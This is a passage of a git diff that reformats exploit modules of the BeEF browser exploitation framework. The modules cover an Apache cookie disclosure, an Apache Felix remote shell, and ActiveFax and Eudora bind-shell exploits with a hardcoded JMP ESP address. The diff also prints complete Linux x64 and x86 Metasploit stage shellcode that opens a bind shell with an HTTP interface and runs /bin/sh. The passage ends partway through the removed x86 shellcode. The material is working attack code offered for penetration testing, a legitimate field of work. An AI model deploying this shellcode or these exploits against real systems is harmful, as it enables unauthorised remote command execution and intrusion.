b/modules/exploits/apache_cookie_disclosure/module.rb index 8b42c4aad..285298126 100644 --- a/modules/exploits/apache_cookie_disclosure/module.rb +++ b/modules/exploits/apache_cookie_disclosure/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Apache_cookies < BeEF::Core::Command - - def post_execute - content = {} - content['apache_cookies'] = @datastore['apache_cookies'] - save content - end - + def post_execute + content = {} + content['apache_cookies'] = @datastore['apache_cookies'] + save content + end end diff --git a/modules/exploits/apache_felix_remote_shell/module.rb b/modules/exploits/apache_felix_remote_shell/module.rb index c80dd98a2..d08a9db40 100644 --- a/modules/exploits/apache_felix_remote_shell/module.rb +++ b/modules/exploits/apache_felix_remote_shell/module.rb @@ -4,13 +4,12 @@ # See the file 'doc/COPYING' for copying permission # class Apache_felix_remote_shell < BeEF::Core::Command - def self.options configuration = BeEF::Core::Configuration.instance lhost = configuration.beef_host - lhost = "" if lhost == "0.0.0.0" - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, + lhost = '' if lhost == '0.0.0.0' + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6666' }, { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost }, { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' } @@ -18,7 +17,6 @@ class Apache_felix_remote_shell < BeEF::Core::Command end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/module.rb b/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/module.rb index 8ce58e1e9..0a6b9991e 100755 --- a/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/module.rb +++ b/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/module.rb @@ -4,20 +4,16 @@ # See the file 'doc/COPYING' for copying permission # class Active_fax_beef_bind < BeEF::Core::Command - - def self.options - configuration = BeEF::Core::Configuration.instance - - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'}, - { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '3000'}, - { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, - { 'name' => 'jmpesp', 'ui_label' => 'JMP ESP', 'value' => '\x77\x9c\x55\x77'} + def self.options + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, + { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '3000' }, + { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' }, + { 'name' => 'jmpesp', 'ui_label' => 'JMP ESP', 'value' => '\x77\x9c\x55\x77' } ] - end - - def post_execute - save({'result' => @datastore['result']}) - end + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/beefbind/beef_bind_exploits/eudora_mail_beef_bind/module.rb b/modules/exploits/beefbind/beef_bind_exploits/eudora_mail_beef_bind/module.rb index 0abd45286..254e51e1d 100755 --- a/modules/exploits/beefbind/beef_bind_exploits/eudora_mail_beef_bind/module.rb +++ b/modules/exploits/beefbind/beef_bind_exploits/eudora_mail_beef_bind/module.rb @@ -4,27 +4,25 @@ # See the file 'doc/COPYING' for copying permission # class Eudora_mail_beef_bind < BeEF::Core::Command - - def self.options + def self.options configuration = BeEF::Core::Configuration.instance - beef_host = "#{configuration.get("beef.http.host")}" - beef_port = "#{configuration.get("beef.http.port")}" + beef_host = configuration.get('beef.http.host').to_s + beef_port = configuration.get('beef.http.port').to_s - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'}, - { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'}, - { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, - { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, - { 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'}, - { 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host}, - { 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port}, - { 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'}, - { 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'} + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, + { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143' }, + { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' }, + { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/' }, + { 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000' }, + { 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host }, + { 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port }, + { 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000' }, + { 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1' } ] - end - - def post_execute - save({'result' => @datastore['result']}) - end + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb index ce3e7f5c8..e77b1b57e 100755 --- a/modules/exploits/beefbind/beef_bind_shell/module.rb +++ b/modules/exploits/beefbind/beef_bind_shell/module.rb @@ -4,22 +4,19 @@ # See the file 'doc/COPYING' for copying permission # class Beef_bind_shell < BeEF::Core::Command - - def self.options - return [ - { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, - { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, - { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, - { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}, + def self.options + [ + { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1' }, + { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' }, + { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/' }, + { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname' }, { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore', - 'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']], - 'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true - } - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end + 'store_fields' => ['shellcode'], 'store_data' => [['Windows'], ['Linux']], + 'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true } + ] + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-handler.rb b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-handler.rb index e1e8e9088..7a0782752 100644 --- a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-handler.rb +++ b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-handler.rb @@ -3,71 +3,65 @@ ## module Msf -module Handler + module Handler + ### + # + # This module implements the Bind TCP handler placeholder only. + # + ### + module BeefBind + include Msf::Handler -### -# -# This module implements the Bind TCP handler placeholder only. -# -### -module BeefBind + # + # Returns the handler specific string representation + # + def self.handler_type + 'beef_bind' + end - include Msf::Handler + # + # Returns the connection oriented general handler type + # + def self.general_handler_type + 'bind' + end - # - # Returns the handler specific string representation - # - def self.handler_type - return "beef_bind" - end + # + # Initializes a bind handler and adds the options common to all bind + # payloads, such as local port. + # + def initialize(info = {}) + super + register_options( + [ + Opt::LPORT(4444) + # OptAddress.new('RHOST', [false, 'The target address', '']), + ], Msf::Handler::BeefBind + ) + end - # - # Returns the connection oriented general handler type - # - def self.general_handler_type - "bind" - end + # + # Placeholder only + # + def cleanup_handler; end - # - # Initializes a bind handler and adds the options common to all bind - # payloads, such as local port. - # - def initialize(info = {}) - super - register_options( - [ - Opt::LPORT(4444), - #OptAddress.new('RHOST', [false, 'The target address', '']), - ], Msf::Handler::BeefBind) - end + # + # Placeholder only + # + def add_handler(_opts = {}) + # Start a new handler + start_handler + end - # - # Placeholder only - # - def cleanup_handler - end - - # - # Placeholder only - # - def add_handler(opts={}) - # Start a new handler - start_handler - end - - # - # Placeholder only - # - def start_handler - end - - # - # Placeholder only - # - def stop_handler - end + # + # Placeholder only + # + def start_handler; end -end - -end + # + # Placeholder only + # + def stop_handler; end + end + end end diff --git a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb index 12bfbb8c0..373b94534 100644 --- a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb +++ b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb @@ -10,76 +10,73 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' module MetasploitModule + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions - include Msf::Payload::Linux - include Msf::Sessions::CommandShellOptions + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => ['Bart Leppens'], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [165, 'n'] + }, + 'Payload' => + "\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" \ + "\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" \ + "\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" \ + "\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" \ + "\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" \ + "\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" \ + "\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" \ + "\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" \ + "\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" \ + "\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" \ + "\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" \ + "\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" \ + "\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" \ + "\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" \ + "\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" \ + "\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" \ + "\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" \ + "\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" \ + "\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" \ + "\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" \ + "\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" \ + "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" \ + "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" \ + "\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" \ + "\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" \ + "\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" \ + "\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" \ + "\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" \ + "\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" \ + "\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" \ + "\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" \ + "\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" \ + "\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" \ + "\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" \ + "\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" \ + "\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" \ + "\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" \ + "\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" \ + "\xf6\x48\x31\xd2\x0f\x05" + })) + end - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)', - 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', - 'Author' => [ 'Bart Leppens' ], - 'License' => BSD_LICENSE, - 'Platform' => 'linux', - 'Arch' => ARCH_X64, - 'Session' => Msf::Sessions::CommandShell, - 'PayloadCompat' => - { - 'Convention' => 'beef_bind' - }, - 'Stage' => - { - 'Offsets' => - { - 'LPORT' => [ 165, 'n' ] - }, - 'Payload' => - "\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" + - "\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" + - "\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" + - "\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" + - "\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" + - "\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" + - "\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" + - "\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" + - "\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" + - "\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" + - "\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" + - "\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" + - "\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" + - "\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" + - "\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" + - "\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" + - "\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" + - "\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" + - "\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" + - "\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" + - "\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" + - "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" + - "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" + - "\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" + - "\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" + - "\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" + - "\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" + - "\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" + - "\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" + - "\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" + - "\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" + - "\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" + - "\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" + - "\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" + - "\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" + - "\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" + - "\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" + - "\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" + - "\xf6\x48\x31\xd2\x0f\x05" - } - )) - end - - # Stage encoding is safe for this payload - def encode_stage? - true - end + # Stage encoding is safe for this payload + def encode_stage? + true + end end - diff --git a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb index 359f5b4b7..3727a4076 100644 --- a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb +++ b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb @@ -10,75 +10,72 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' module MetasploitModule + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions - include Msf::Payload::Linux - include Msf::Sessions::CommandShellOptions + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => ['Bart Leppens'], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [168, 'n'] + }, + 'Payload' => + "\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" \ + "\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" \ + "\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" \ + "\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" \ + "\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" \ + "\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" \ + "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" \ + "\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" \ + "\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" \ + "\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" \ + "\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" \ + "\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" \ + "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" \ + "\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" \ + "\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" \ + "\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" \ + "\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" \ + "\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" \ + "\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" \ + "\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" \ + "\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" \ + "\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" \ + "\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" \ + "\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" \ + "\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" \ + "\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" \ + "\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \ + "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" \ + "\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" \ + "\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" \ + "\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" \ + "\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" \ + "\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" \ + "\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" \ + "\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" \ + "\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" \ + "\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" \ + "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80" + })) + end - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)', - 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', - 'Author' => [ 'Bart Leppens' ], - 'License' => BSD_LICENSE, - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'Session' => Msf::Sessions::CommandShell, - 'PayloadCompat' => - { - 'Convention' => 'beef_bind' - }, - 'Stage' => - { - 'Offsets' => - { - 'LPORT' => [ 168, 'n' ] - }, - 'Payload' => - "\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" + - "\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" + - "\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" + - "\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" + - "\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" + - "\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" + - "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" + - "\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" + - "\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" + - "\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" + - "\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" + - "\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" + - "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" + - "\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" + - "\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" + - "\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" + - "\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" + - "\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" + - "\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" + - "\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" + - "\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" + - "\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" + - "\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" + - "\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" + - "\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" + - "\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" + - "\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" + - "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" + - "\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" + - "\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" + - "\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" + - "\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" + - "\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" + - "\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" + - "\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" + - "\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" + - 